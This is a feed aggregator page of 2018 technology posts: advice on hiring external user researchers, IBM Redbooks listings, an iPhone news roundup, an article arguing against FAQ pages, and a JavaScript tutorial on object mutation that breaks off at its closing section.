Feed aggregator

Working with External User Researchers: Part I

A list Apart development site - Tue, 01/16/2018 - 10:00

You’ve got an idea or perhaps some rough sketches, or you have a fully formed product nearing launch. Or maybe you’ve launched it already. Regardless of where you are in the product lifecycle, you know you need to get input from users.

You have a few sound options to get this input: use a full-time user researcher or contract out the work (or maybe a combination of both). Between the three of us, we’ve run a user research agency, hired external researchers, and worked as freelancers. Through our different perspectives, we hope to provide some helpful considerations.

Should you hire an external user researcher?

First things first–in this article, we focus on contracting external user researchers, meaning that a person or team is brought on for the duration of a contract to conduct the research. Here are the most common situations where we find this type of role:

Organizations without researchers on staff: It would be great if companies validated their work with users during every iteration. But unfortunately, in real-world projects, user research happens at less frequent intervals, meaning there might not be enough work to justify hiring a full-time researcher. For this reason, it sometimes makes sense to use external people as needed.

Organizations whose research staff is maxed out: In other cases, particularly with large companies, there may already be user researchers on the payroll. Sometimes these researchers are specific to a particular effort, and other times the researchers themselves function as internal consultants, helping out with research across multiple projects. Either way, there is a finite amount of research staff, and sometimes the staff gets overbooked. These companies may then pull in additional contract-based researchers to independently run particular projects or to provide support to full-time researchers.

Organizations that need special expertise: Even if a company does have user research on staff and those researchers have time, it’s possible that there are specialized kinds of user research for which an external contract-based researcher is brought on. For example, they may want to do research with representative users who regularly use screen readers, so they bring in an accessibility expert who also has user research skills. Or they might need a researcher with special quantitative skills for a certain project.

Why hire an external researcher vs. other options?

Designers as researchers: You could hire a full-time designer who also has research skills. But a designer usually won’t have the same level of research expertise as a dedicated researcher. Additionally, they may end up researching their own designs, making it extremely difficult to moderate test sessions without any form of bias.

Product managers as researchers: While it’s common for enthusiastic product managers to want to conduct their own guerilla user research, this is often a bad idea. Product managers tend to hear feedback that validates their ideas and most often aren’t trained on how to ask non-leading questions.

Temporary roles: You could also bring on a researcher in a staff augmentation role, meaning someone who works for you full-time for an extended period of time, but who is not considered a full-time employee. This can be a bit harder to justify. For example, there may be legal requirements that you’d have to pass if you directly contract an individual. Or you could find someone through a staffing agency–fewer legal hurdles, but likely far pricier.

If these options don’t sound like a good fit for your needs, hiring an external user researcher on a project-specific basis could be the best solution for you. They give you exactly what you need without additional commitment or other risks. They may be a freelancer (or a slightly larger microbusiness), or even a team farmed out for a particular project by a consulting firm or agency.

What kinds of projects would you contract a user researcher for?

You can reasonably expect that anyone or any company that advertises their skillset as user research likely can do the full scope of qualitative efforts—from usability studies of all kinds, to card sorts, to ethnographic and exploratory work.

Contracting out quantitative work is a bit riskier. An analogy that comes to mind is using TurboTax to file your taxes. While TurboTax may be just fine for many situations, it’s easy to overlook what you don’t know in terms of more complicated tax regulations, which can quickly get you in trouble. Similarly, with quantitative work, there’s a long list of diverse, specialized quantitative skills (e.g., logs analysis, conjoint, Kano, and multiple regression). Don’t assume someone advertising as a general quantitative user researcher has the exact skills you need.

Also, for some companies, quantitative work comes with unique user privacy considerations that can require special internal permissions from legal and privacy teams.

But if the topic of your project is pretty easy to grasp and absorb without needing much specialized technical or organizational insight, hiring an external researcher is generally a great option.

What are the benefits to hiring an external researcher?

A new, objective perspective is one major benefit to hiring an external researcher. We all suffer from design fixation and are influenced by organizational politics and perceived or real technical constraints. Hiring an unbiased external researcher can uncover more unexpected issues and opportunities.

Contracting a researcher can also expand an internal researcher’s ability to influence. Having someone else moderate research studies frees up in-house researchers to be part of the conversations among stakeholders that happen while user interviews are being observed. If they are intuitively aware of an issue or opportunity, they can emphasize their perspective during those critical, decision-making moments that they often miss out on when they moderate studies themselves. In these situations, the in-house team can even design the study plan, draft the discussion guide, and just have the contractor moderate the study. The external researcher may then collaborate with the in-house researcher on the final report.

More candid and honest feedback can come out of hiring an external researcher. Research participants tend to be more comfortable sharing more critical feedback with someone who doesn’t work for the company whose product is being tested.

Lastly, if you need access to specialized research equipment or software (for example, proprietary online research tools), it can be easier to get it via an external researcher.

How do I hire an external user researcher?

So you’ve decided that you need to bring on an external user researcher to your team. How do you get started?

Where to find them

Network: Don’t wait until you need help to start networking and collecting a list of external researchers. Be proactive. Go to UX events in your local region. You’ll meet consultants and freelancers at those events, as well as people who have contracted out research and can make recommendations. You won’t necessarily have the opportunity for deep conversations, but you can continue a discussion over coffee or drinks!

Referrals: Along those same lines, when you anticipate a need at some point in the future, seek out trusted UX colleagues at your company and elsewhere. Ask them to connect you with people that they may have worked with.

What about a request for proposal (RFP)?

Your company may require you to specify your need in the form of an RFP, which is a document that outlines your project needs and specifications, and asks for bids in response.

An RFP provides these benefits:

  • It keeps the playing field level, and anyone who wants to bid on a project can (in theory).
  • You can be very specific about what you’re looking for, and get bids that can be easy to compare on price.

On the other hand, an RFP comes with limitations:

  • You may think your requirements were very specific, but respondents may interpret them in different ways. This can result in large quote differences.
  • You may be eliminating smaller players—those freelancers and microbusinesses who may be able to give you the highest level of seniority for the dollar but don’t have the staff to respond to RFPs quickly.
  • You may be forced to be very concrete about your needs when you are not yet sure what you’ll actually need.

When it comes to RFPs, the most important thing to remember is to clearly and thoroughly specify your needs. Don’t forget to include small but important details that can matter in terms of pricing, such as answers to these questions:

  • Who is responsible for recruitment of research participants?
  • How many participants do you want included?
  • Who will be responsible for distributing participant incentives?
  • Who will be responsible for localizing prototypes?
  • How long will sessions be?
  • Over how many days and locations will they be?
  • What is the format of expected deliverables?
  • Do you want full, transcribed videos, or video clips?

It’s these details that will ultimately result in receiving informed proposals that are easy to compare.

Do a little digging on their backgrounds

Regardless of how you find a potential researcher, make sure you check out their credentials if you haven’t worked with them before.

At the corporate level, review the company: Google them and make sure that user research seems to be one of their core competencies. The same is true when dealing with a freelancer or microbusiness: Google them and see whether you get research-oriented results, and also check them out on social media.

Certainly feel free to ask for references if you don’t already have a direct connection, but take them with a grain of salt. Between the self-selecting nature of a reference, and a potential reference just trying to be nice to a friend, these can never be fully trusted.

One of the strongest indicators of experience and quality work is if a researcher has been hired by the same client for more than one project over time.

Larger agencies, individual researchers, or something in-between?

So you’ve got a solid sense of what research you need, and you’ve got several quality options to choose from. But external researchers come in all shapes and sizes, from single freelancers to very large agencies. How do you choose what’s best for your project while still evaluating the external researchers fairly?

Larger consulting firms and agencies do have some distinct advantages—namely that you’ve got a large company to back up the project. Even if one researcher isn’t available as expected (for example, if the project timeline slips), another can take their place. They also likely have a whole infrastructure for dealing with contracts like yours.

On the other hand, this larger infrastructure may add extra burden on your side. You may not know who exactly is going to be working on your project, or their level of seniority or experience. Changes in scope will likely be more involved. Larger infrastructure also likely means higher costs.

Individual (freelance) researchers also have some key advantages. You will likely have more control over contracting requirements. They are also likely to be more flexible—and less costly. In addition, if they were referred to you, you will be working with a specific resource that you can get to know over multiple projects.

Bringing on individual researchers can incur a little more risk. You will need to make sure that you can properly justify hiring an external researcher instead of an employee. (In the United States, the IRS has a variety of tests to make sure it is OK.) And if your project timeline slips, you run a greater risk of losing the researcher to some other commitment without someone to replace them.

A small business, a step between an individual researcher and a large firm, has some advantages over hiring an individual. Contracting an established business may involve less red tape, and you will still have the personal touch of knowing exactly who is conducting your research.

An established business also shows a certain level of commitment, even if it’s one person. For example, a microbusiness could represent a single freelancer, but it could also involve a very small number of employees or established relationships with trusted subcontractors (or both). Whatever the configuration,  don’t expect a business of this size to have the ability to readily respond to RFPs.

The money question

Whether you solicit RFPs or get a single bid, price quotes will often differ significantly. User research is not a product but rather a customized and sophisticated effort around your needs. Here are some important things to consider:

  • Price quotes are a reflection of how a project is interpreted. Different researchers are going to interpret your needs in different ways. A good price quote clearly details any assumptions that are going into pricing so you can quickly see if something is misaligned.
  • Research teams are made up of staff with different levels of experience. A quote is going to be a reflection of the overall seniority of the team, their salaries and benefits, the cost of any business resources they use, and a reasonable profit margin for the business.
  • Businesses all want to make a reasonable profit, but approaches to profitability differ. Some organizations may balance having a high volume of work with less profit per project. Other organizations may take more of a boutique approach: more selectivity over projects taken on, with added flexibility to focus on those projects, but also with a higher profit margin.
  • Overbooked businesses provide higher quotes. Some consultants and agencies are in the practice of rarely saying no to a request, even if they are at capacity in terms of their workload. In these instances, it can be a common practice to multiply a quote by as much as three—if you say no, no harm done given they’re at capacity. However, if you say yes, the substantial profit is worth the cost for them to hire additional resources and to work temporarily above capacity in the meantime.

To determine whether a researcher or research team is right for you, you’ll certainly need to look at the big picture, including pricing, associated assumptions, and the seniority and background of the individuals who are doing the work.

Remember, it’s always OK to negotiate

If you have a researcher or research team that you want to work with but their pricing isn’t in line with your budget, let them know. It could be that the quote is just based on faulty assumptions. They may expect you to negotiate and are willing to come down in price; they may also offer alternative, cheaper options with them.

Next steps

Hiring an external user researcher typically brings a long list of benefits. But like most relationships, you’ll need to invest time and effort to foster a healthy working dynamic between you, your external user researcher, and your team. Stay tuned for the next installment, where we’ll focus on how to collaborate together.

Categories: Technology

IBM FlashSystem 900 Model AE3 Product Guide

IBM Redbooks Site - Mon, 01/15/2018 - 08:30
Redpaper, published: Mon, 15 Jan 2018

Today’s global organizations depend on the ability to unlock business insights from massive volumes of data.

Categories: Technology

IBM Spectrum Archive Enterprise Edition V1.2.5.1 Installation and Configuration Guide

IBM Redbooks Site - Fri, 01/12/2018 - 08:30
Redbook, published: Fri, 12 Jan 2018

This IBM® Redbooks® publication helps you with the planning, installation, and configuration of the new IBM Spectrum™ Archive V1.2.5.1 for the IBM TS3310, IBM TS3500, IBM TS4300, and IBM TS4500 tape libraries.

Categories: Technology

IBM Spectrum Scale: Big Data and Analytics Solution Brief

IBM Redbooks Site - Fri, 01/12/2018 - 08:30
Draft Redpaper, last updated: Fri, 12 Jan 2018

This IBM® Redguide™ publication describes big data and analytics (BD&A) deployments that are built on IBM Spectrum Scale™.

Categories: Technology

IBM FlashSystem V9000 AE3 and AC3 Performance

IBM Redbooks Site - Fri, 01/12/2018 - 08:30
Draft Redpaper, last updated: Fri, 12 Jan 2018

This IBM® Redpaper™ publication provides information about the best practices and performance capabilities when implementing a storage solution using IBM FlashSystem® V9000 9846-AC3 with IBM FlashSystem V9000 9846-AE3 storage enclosures.

Categories: Technology

In the news

iPhone J.D. - Fri, 01/12/2018 - 00:08

I reported earlier this week on new rules relating to confidential and privileged data on an iPhone when you pass through customs to re-enter the U.S.  Maureen Blando of Mobile Helix discusses one alternative to dealing with Customs:  keep your data on a cloud-based service (like Mobile Helix) so that you can just remove the app before you enter customs — at which point the privileged documents won't even be there anymore — and then re-install the app after you pass through.  1Password offers something similar called Travel Mode whereby all but a few passwords you select are removed from the device, and then you restore them after you enter customs.  If you use Microsoft Exchange with the Mail app on your iPhone, you could just turn off your email in the Settings app (Accounts & Passwords -> [select account] -> turn off Mail) until you get to a location where you feel secure again, and then turn it back on to re-download your messages.  And now, the news of note from the past week:

  • Samantha Cole of Motherboard reports on a murder trial in Germany in which some of the evidence of the defendant disposing of a body in the river consists of data from the defendant's iPhone.  After hiring a forensics company to bypass the passcode on his iPhone 6s, the investigators found data in the Health app showing that the defendant climbed stairs during the period of time that the prosecution alleges that the defendant climbed up the river embankment.
  • According to Katherine Faulders of ABC News, this week White House Chief of Staff John Kelly instituted a new ban on personal cellphones in the White House.  The ban extends to smartwatches, like the Apple Watch.  I suspect that there will still be one particular iPhone in the White House not subject to the ban.
  • Chance Miller of 9to5Mac reports on a recent interview by Rebecca Jarvis of ABC Radio with Angela Ahrendts, Apple VP of Retail.  The video discusses how Ahrendts got the job even though she doesn't consider herself a "techie."
  • Paula Parisi of Variety reports that Jimmy Iovine, one of the Apple executives behind Apple Music, has denied rumors that he is planning to leave Apple this year, and says that he looks forward to further developments in online streaming.
  • Apple released iOS 11.2.2 this week.  As Juli Clover of MacRumors explains, this update addresses the Meltdown and Spectre vulnerabilities that have been in the news as of late.  I always recommend that you update your iPhone (and iPad) when there is a new iOS version to make sure that you have the latest security patches, although it does make sense to wait 24 hours before applying the update just in case Apple discovers some problem with the update, which happens occasionally.
  • If you want an alternative to using your iPhone, Apple Watch or Siri to turn off your HomeKit lights, you can soon buy a big red button — or one of another color.  Zac Hall of 9to5Mac reports that Fibaro's The Button will soon be HomeKit compatible.
  • Jesse Hollington of iLounge explains how you can handoff a call from your iPhone to your Apple Watch.  I didn't realize you could do that.
  • Bradley Chambers of The Sweet Setup reviews Workouts++ and says that it is the best stand-along workout app on the Apple Watch.
  • Thuy Ong of The Verge reports that the Qi wireless standard used by Apple in the iPhone X and the iPhone 8 is becoming even more of a standard now that Powermat is giving up on the rival PMA standard.
  • Chaim Gartenberg of The Verge discusses some of Belkin's upcoming Qi chargers for the iPhone.
  • Glenn Fleishman of Macworld discusses how the iPhone uses a captive page on the Apple website to determine whether a Wi-Fi hotspot has a sign-in page.
  • And finally, the always funny xkcd comic predicts what future iPhone security settings might look like (original link):

 

Categories: iPhone Web Sites

No More FAQs: Create Purposeful Information for a More Effective User Experience

A list Apart development site - Thu, 01/11/2018 - 10:00

It’s normal for your website users to have recurring questions and need quick access to specific information to complete … whatever it is they came looking for. Many companies still opt for the ubiquitous FAQ (frequently asked/anticipated questions) format to address some or even all information needs. But FAQs often miss the mark because people don’t realize that creating effective user information—even when using the apparently simple question/answer format—is complex and requires careful planning.

As a technical writer and now information architect, I’ve worked to upend this mediocre approach to web content for more than a decade, and here’s what I’ve learned: instead of defaulting to an unstructured FAQ, invest in information that’s built around a comprehensive content strategy specifically designed to meet user and company goals. We call it purposeful information.

The problem with FAQs

Because of the internet’s Usenet heritage—discussion boards where regular contributors would produce FAQs so they didn’t have to repeat information for newbies—a lot of early websites started out by providing all information via FAQs. Well, the ‘80s called, and they want their style back!

Unfortunately, content in this simple format can often be attractive to organizations, as it’s “easy” to produce without the need to engage professional writers or comprehensively work on information architecture (IA) and content strategy. So, like zombies in a horror film, and with the same level of intellectual rigor, FAQs continue to pop up all over the web. The trouble is, this approach to documentation-by-FAQ has problems, and the information is about as far from being purposeful as it’s possible to get.

For example, when companies and organizations resort to documentation-by-FAQ, it’s often the only place certain information exists, yet users are unlikely to spend the time required to figure that out. Conversely, if information is duplicated, it’s easy for website content to get out of sync. The FAQ page can also be a dumping ground for any information a company needs to put on the website, regardless of the topic. Worse, the page’s format and structure can increase confusion and cognitive load, while including obviously invented questions and overt marketing language can result in losing users’ trust quickly. Looking at each issue in more detail:

  • Duplicate and contradictory information: Even on small websites, it can be hard to maintain information. On large sites with multiple authors and an unclear content strategy, information can get out of sync quickly, resulting in duplicate or even contradictory content. I once purchased food online from a company after reading in their FAQ—the content that came up most often when searching for allergy information—that the product didn’t contain nuts. However, on receiving the product and reading the label, I realized the FAQ information was incorrect, and I was able to obtain a refund. An information architecture (IA) strategy that includes clear pathways to key content not only better supports user information needs that drive purchases, but also reduces company risk. If you do have to put information in multiple locations, consider using an object-oriented content management system (CMS) so content is reused, not duplicated. (Our company open-sourced one called Fae.)
  • Lack of discernible content order: Humans want information to be ordered in ways they can understand, whether it’s alphabetical, time-based, or by order of operation, importance, or even frequency. The question format can disguise this organization by hiding the ordering mechanism. For example, I could publish a page that outlines a schedule of household maintenance tasks by frequency, with natural categories (in order) of daily, weekly, monthly, quarterly, and annually. But putting that information into an FAQ format, such as “How often should I dust my ceiling fan?,” breaks that logical organization of content—it’s potentially a stand-alone question. Even on a site that’s dedicated only to household maintenance, that information will be more accessible if placed within the larger context of maintenance frequency.
  • Repetitive grammatical structure: Users like to scan for information, so having repetitive phrases like “How do I …” that don’t relate to the specific task make it much more difficult for readers to quickly find the relevant content. In a lengthy help page with catch-all categories, like the Patagonia FAQ page, users have to swim past a sea of “How do I …,” “Why can’t I …,” and “What do I …” phrases to get to the actual information. While categories can help narrow the possibilities, the user still has to take the time to find the most likely category and then the relevant question within it. The Patagonia website also shows how an FAQ section can become a catch-all. Oh, how I’d love the opportunity to restructure all that Patagonia information into purposeful information designed to address user needs at the exact right moment. So much potential!
  • Increased cognitive load: As well as being repetitive, the question format can also be surprisingly specific, forcing users to mentally break apart the wording of the questions to find a match for their need. If a question appears to exclude the required information, the user may never click to see the answer, even if it is actually relevant. Answers can also raise additional, unnecessary questions in the minds of users. Consider the FAQ-formatted “Can I pay my bill with Venmo?” (which limits the answer to one payment type that only some users may recognize). Rewriting the question to “How can I pay my bill online?” and updating the content improves the odds that users will read the answer and be able to complete their task. However, an even better approach is to create purposeful content under the more direct and concise heading “Online payment options,” which is broad enough to cover all payment services (as a topic in the “Bill Payments” portion of a website), as well as instructions and other task-orientated information.
  • Longer content requirements: In most cases, questions have a longer line length than topic headings. The Airbnb help page illustrates when design and content strategy clash. The design truncates the question after 40 characters when the browser viewport is wider than 743 pixels. You have to click the question to find out if it holds the answer you need—far from ideal! Yet the heading “I’m a guest. How do I check the status of my reservation?” could easily have been rewritten as “Checking reservation status” or even “Guests: Checking reservation status.” Not only do these alternatives fit within the line length limitations set by the design, but the lower word count and simplified English also reduce translation costs (another issue some companies have to consider).
Purposeful information

Grounded in the Minimalist approach to technical documentation, the idea behind purposeful information is that users come to any type of content with a particular purpose in mind, ranging from highly specific (task completion) to general learning (increased knowledge). Different websites—and even different areas within a single website—may be aimed at different users and different purposes. Organizations also have goals when they construct websites, whether they’re around brand awareness, encouraging specific user behavior, or meeting legal requirements. Companies that meld user and organization goals in a way that feels authentic can be very successful in building brand loyalty.

Commerce sites, for example, have the goal of driving purchases, so the information on the site needs to provide content that enables effortless purchasing decisions. For other sites, the goal might be to drive user visits, encourage newsletter sign-ups, or increase brand awareness. In any scenario, burying in FAQs any pathways needed by users to complete their goals is a guaranteed way to make it less likely that the organization will meet theirs.

By digging into what users need to accomplish (not a general “they need to complete the form,” but the underlying, real-world task, such as getting a shipping quote, paying a bill, accessing health care, or enrolling in college), you can design content to provide the right information at the right time and better help users accomplish those goals. As well as making it less likely you’ll need an FAQ section at all, using this approach to generate a credible IA and content strategy—the tools needed to determine a meaningful home for all your critical content—will build authority and user trust.

Defining specific goals when planning a website is therefore essential if content is to be purposeful throughout the site. Common user-centered methodologies employed during both IA and content planning include user-task analysis, content audits, personas, user observations, and analysis of call center data and web analytics. A complex project might use multiple methodologies to define the content strategy and supporting IA to provide users with the necessary information.

The redesign of the Oliver Winery website is a good example of creating purposeful information instead of resorting to an FAQ. There was a user goal of being able to find practical information about visiting the winery (such as details regarding food, private parties, etc.), yet this information was scattered across various pages, including a partially complete FAQ. There was a company goal of reducing the volume of calls to customer support. In the redesign, a single page called “Plan Your Visit” was created with all the relevant topics. It is accessible from the “Visit” section and via the main navigation.

The system used is designed to be flexible. Topics are added, removed, and reordered using the CMS, and published on the “Plan Your Visit” page, which also shows basic logistical information like hours and contact details, in a non-FAQ format. Conveniently, contact details are maintained in only one location within the CMS yet published on various pages throughout the site. As a result, all information is readily available to users, increasing the likelihood that they’ll make the decision to visit the winery.

If you have to include FAQs

This happens. Even though there are almost always more effective ways to meet user needs than writing an FAQ, FAQs happen. Sometimes the client insists, and sometimes even the most ardent opponent (ahem) concludes that in a very particular circumstance, an FAQ can be purposeful. The most effective FAQ is one with a specific, timely, or transactional need, or one with information that users need repeated access to, such as when paying bills or organizing product returns.

Good topics for an FAQ include transactional activities, such as those involved in the buying process: think shipments, payments, refunds, and returns. By being specific and focusing on a particular task, you avoid the categorization problem described earlier. By limiting questions to those that are frequently asked AND that have a very narrow focus (to reduce users having to sort through lots of content), you create more effective FAQs.

Amazon’s support center has a great example of an effective FAQ within their overall support content because they have exactly one: “Where’s My Stuff?.” Set under the “Browse Help Topics” heading, the question leads to a list of task-based topics that help users track down the location of their missing packages. Note that all of the other support content is purposeful, set in a topic-based help system that’s nicely categorized, with a search bar that allows users to dive straight in.

Conference websites, which by their nature are already focused on a specific company goal (conference sign-ups), often have an FAQ section that covers basic conference information, logistics, or the value of attending. This can be effective. However, for the reasons outlined earlier, the content can quickly become overwhelming if conference organizers try to include all information about the conference as a single list of questions, as demonstrated by Web Summit’s FAQ page. Overdoing it can cause confusion even when the design incorporates categories and an otherwise useful UX that includes links, buttons, or tabs, such as on the FAQ page of The Next Web Conference.

In examining these examples, it’s apparent how much more easily users could access the information if it wasn’t presented as questions. But if you do have to use FAQs, here are my tips for creating the best possible user experience.

Creating a purposeful FAQ:

  • Make it easy to find.
  • Have a clear purpose and highly specific content in mind.
  • Give it a clear title related to the user tasks (e.g., “Shipping FAQ” rather than just “FAQ”).
  • Use clear, concise wording for questions.
  • Focus questions on user goals and tasks, not on product or brand.
  • Keep it short.

What to avoid in any FAQ:

  • Don’t include “What does FAQ stand for?” (unfortunately, not a fictional example). Instead, simply define acronyms and initialisms on first use.
  • Don’t define terms using an FAQ format—it’s a ticket straight to documentation hell. If you have to define terms, what you need is a glossary, not FAQs.
  • Don’t tell your brand story or company history, or pontificate. People don’t want to know as much about your brand, product, and services as you are eager to tell them. Sorry.
In the end, always remember your users

Your website should be filled with purposeful content that meets users’ core needs and fulfills your company’s objectives. Do your users and your bottom line a favor and invest in effective user analysis, IA, content strategy, and documentation. Your users will be able to find the information they need, and your brand will be that much more awesome as a result.

Categories: Technology

IBM System Storage SAN Volume Controller and Storwize V7000 Best Practices and Performance Guidelines

IBM Redbooks Site - Wed, 01/10/2018 - 08:30
Draft Redbook, last updated: Wed, 10 Jan 2018

This IBM® Redbooks® publication captures several of the preferred practices and describes the performance gains that can be achieved by implementing the IBM System Storage® SAN Volume Controller and IBM Storwize® V7000 powered by IBM Spectrum™ Virtualize V8.1.

Categories: Technology

Why Mutation Can Be Scary

A list Apart development site - Tue, 01/09/2018 - 10:00

A note from the editors: This article contain sample lessons from Learn JavaScript, a course that helps you learn JavaScript to build real-world components from scratch.

To mutate means to change in form or nature. Something that’s mutable can be changed, while something that’s immutable cannot be changed. To understand mutation, think of the X-Men. In X-Men, people can suddenly gain powers. The problem is, you don’t know when these powers will emerge. Imagine your friend turns blue and grows fur all of a sudden; that’d be scary, wouldn’t it?

h2 code, h3 code { text-transform: none; }

In JavaScript, the same problem with mutation applies. If your code is mutable, you might change (and break) something without knowing.

Objects are mutable in JavaScript

In JavaScript, you can add properties to an object. When you do so after instantiating it, the object is changed permanently. It mutates, like how an X-Men member mutates when they gain powers.

In the example below, the variable egg mutates once you add the isBroken property to it. We say that objects (like egg) are mutable (have the ability to mutate).

const egg = { name: "Humpty Dumpty" }; egg.isBroken = false; console.log(egg); // { // name: "Humpty Dumpty", // isBroken: false // }

Mutation is pretty normal in JavaScript. You use it all the time.

Here’s when mutation becomes scary.

Let’s say you create a constant variable called newEgg and assign egg to it. Then you want to change the name of newEgg to something else.

const egg = { name: "Humpty Dumpty" }; const newEgg = egg; newEgg.name = "Errr ... Not Humpty Dumpty";

When you change (mutate) newEgg, did you know egg gets mutated automatically?

console.log(egg); // { // name: "Errr ... Not Humpty Dumpty" // }

The example above illustrates why mutation can be scary—when you change one piece of your code, another piece can change somewhere else without your knowing. As a result, you’ll get bugs that are hard to track and fix.

This weird behavior happens because objects are passed by reference in JavaScript.

Objects are passed by reference in JavaScript

To understand what “passed by reference” means, first you have to understand that each object has a unique identity in JavaScript. When you assign an object to a variable, you link the variable to the identity of the object (that is, you pass it by reference) rather than assigning the variable the object’s value directly. This is why when you compare two different objects, you get false even if the objects have the same value.

console.log({} === {}); // false

When you assign egg to newEgg, newEgg points to the same object as egg. Since egg and newEgg are the same thing, when you change newEgg, egg gets changed automatically.

console.log(egg === newEgg); // true

Unfortunately, you don’t want egg to change along with newEgg most of the time, since it causes your code to break when you least expect it. So how do you prevent objects from mutating? Before you understand how to prevent objects from mutating, you need to know what’s immutable in JavaScript.

Primitives are immutable in JavaScript

In JavaScript, primitives (String, Number, Boolean, Null, Undefined, and Symbol) are immutable; you cannot change the structure (add properties or methods) of a primitive. Nothing will happen even if you try to add properties to a primitive.

const egg = "Humpty Dumpty"; egg.isBroken = false; console.log(egg); // Humpty Dumpty console.log(egg.isBroken); // undefined const doesn’t grant immutability

Many people think that variables declared with const are immutable. That’s an incorrect assumption.

Declaring a variable with const doesn’t make it immutable, it prevents you from assigning another value to it.

const myName = "Zell"; myName = "Triceratops"; // ERROR

When you declare an object with const, you’re still allowed to mutate the object. In the egg example above, even though egg is created with const, const doesn’t prevent egg from mutating.

const egg = { name: "Humpty Dumpty" }; egg.isBroken = false; console.log(egg); // { // name: "Humpty Dumpty", // isBroken: false // } Preventing objects from mutating

You can use Object.assign and assignment to prevent objects from mutating.

Object.assign

Object.assign lets you combine two (or more) objects together into a single one. It has the following syntax:

const newObject = Object.assign(object1, object2, object3, object4);

newObject will contain properties from all of the objects you’ve passed into Object.assign.

const papayaBlender = { canBlendPapaya: true }; const mangoBlender = { canBlendMango: true }; const fruitBlender = Object.assign(papayaBlender, mangoBlender); console.log(fruitBlender); // { // canBlendPapaya: true, // canBlendMango: true // }

If two conflicting properties are found, the property in a later object overwrites the property in an earlier object (in the Object.assign parameters).

const smallCupWithEar = { volume: 300, hasEar: true }; const largeCup = { volume: 500 }; // In this case, volume gets overwritten from 300 to 500 const myIdealCup = Object.assign(smallCupWithEar, largeCup); console.log(myIdealCup); // { // volume: 500, // hasEar: true // }

But beware! When you combine two objects with Object.assign, the first object gets mutated. Other objects don’t get mutated.

console.log(smallCupWithEar); // { // volume: 500, // hasEar: true // } console.log(largeCup); // { // volume: 500 // } Solving the Object.assign mutation problem

You can pass a new object as your first object to prevent existing objects from mutating. You’ll still mutate the first object though (the empty object), but that’s OK since this mutation doesn’t affect anything else.

const smallCupWithEar = { volume: 300, hasEar: true }; const largeCup = { volume: 500 }; // Using a new object as the first argument const myIdealCup = Object.assign({}, smallCupWithEar, largeCup);

You can mutate your new object however you want from this point. It doesn’t affect any of your previous objects.

myIdealCup.picture = "Mickey Mouse"; console.log(myIdealCup); // { // volume: 500, // hasEar: true, // picture: "Mickey Mouse" // } // smallCupWithEar doesn't get mutated console.log(smallCupWithEar); // { volume: 300, hasEar: true } // largeCup doesn't get mutated console.log(largeCup); // { volume: 500 } But Object.assign copies references to objects

The problem with Object.assign is that it performs a shallow merge—it copies properties directly from one object to another. When it does so, it also copies references to any objects.

Let’s explain this statement with an example.

Suppose you buy a new sound system. The system allows you to declare whether the power is turned on. It also lets you set the volume, the amount of bass, and other options.

const defaultSettings = { power: true, soundSettings: { volume: 50, bass: 20, // other options } };

Some of your friends love loud music, so you decide to create a preset that’s guaranteed to wake your neighbors when they’re asleep.

const loudPreset = { soundSettings: { volume: 100 } };

Then you invite your friends over for a party. To preserve your existing presets, you attempt to combine your loud preset with the default one.

const partyPreset = Object.assign({}, defaultSettings, loudPreset);

But partyPreset sounds weird. The volume is loud enough, but the bass is non-existent. When you inspect partyPreset, you’re surprised to find that there’s no bass in it!

console.log(partyPreset); // { // power: true, // soundSettings: { // volume: 100 // } // }

This happens because JavaScript copies over the reference to the soundSettings object. Since both defaultSettings and loudPreset have a soundSettings object, the one that comes later gets copied into the new object.

If you change partyPreset, loudPreset will mutate accordingly—evidence that the reference to soundSettings gets copied over.

partyPreset.soundSettings.bass = 50; console.log(loudPreset); // { // soundSettings: { // volume: 100, // bass: 50 // } // }

Since Object.assign performs a shallow merge, you need to use another method to merge objects that contain nested properties (that is, objects within objects).

Enter assignment.

assignment

assignment is a small library made by Nicolás Bevacqua from Pony Foo, which is a great source for JavaScript knowledge. It helps you perform a deep merge without having to worry about mutation. Aside from the method name, the syntax is the same as Object.assign.

// Perform a deep merge with assignment const partyPreset = assignment({}, defaultSettings, loudPreset); console.log(partyPreset); // { // power: true, // soundSettings: { // volume: 100, // bass: 20 // } // }

assignment copies over values of all nested objects, which prevents your existing objects from getting mutated.

If you try to change any property in partyPreset.soundSettings now, you’ll see that loudPreset remains as it was.

partyPreset.soundSettings.bass = 50; // loudPreset doesn't get mutated console.log(loudPreset); // { // soundSettings { // volume: 100 // } // }

assignment is just one of many libraries that help you perform a deep merge. Other libraries, including lodash.assign and merge-options, can help you do it, too. Feel free to choose from any of these libraries.

Should you always use assignment over Object.assign?

As long as you know how to prevent your objects from mutating, you can use Object.assign. There’s no harm in using it as long as you know how to use it properly.

However, if you need to assign objects with nested properties, always prefer a deep merge over Object.assign.

Ensuring objects don’t mutate

Although the methods I mentioned can help you prevent objects from mutating, they don’t guarantee that objects don’t mutate. If you made a mistake and used Object.assign for a nested object, you’ll be in for deep trouble later on.

To safeguard yourself, you might want to guarantee that objects don’t mutate at all. To do so, you can use libraries like ImmutableJS. This library throws an error whenever you attempt to mutate an object.

Alternatively, you can use Object.freeze and deep-freeze. These two methods fail silently (they don’t throw errors, but they also don’t mutate the objects).

Object.freeze and deep-freeze

Object.freeze prevents direct properties of an object from changing.

const egg = { name: "Humpty Dumpty", isBroken: false }; // Freezes the egg Object.freeze(egg); // Attempting to change properties will silently fail egg.isBroken = true; console.log(egg); // { name: "Humpty Dumpty", isBroken: false }

But it doesn’t help when you mutate a deeper property like defaultSettings.soundSettings.base.

const defaultSettings = { power: true, soundSettings: { volume: 50, bass: 20 } }; Object.freeze(defaultSettings); defaultSettings.soundSettings.bass = 100; // soundSettings gets mutated nevertheless console.log(defaultSettings); // { // power: true, // soundSettings: { // volume: 50, // bass: 100 // } // }

To prevent a deep mutation, you can use a library called deep-freeze, which recursively calls Object.freeze on all objects.

const defaultSettings = { power: true, soundSettings: { volume: 50, bass: 20 } }; // Performing a deep freeze (after including deep-freeze in your code per instructions on npm) deepFreeze(defaultSettings); // Attempting to change deep properties will fail silently defaultSettings.soundSettings.bass = 100; // soundSettings doesn't get mutated anymore console.log(defaultSettings); // { // power: true, // soundSettings: { // volume: 50, // bass: 20 // } // } Don’t confuse reassignment with mutation

When you reassign a variable, you change what it points to. In the following example, a is changed from 11 to 100.

let a = 11; a = 100;

When you mutate an object, it gets changed. The reference to the object stays the same.

const egg = { name: "Humpty Dumpty" }; egg.isBroken = false; Wrapping up

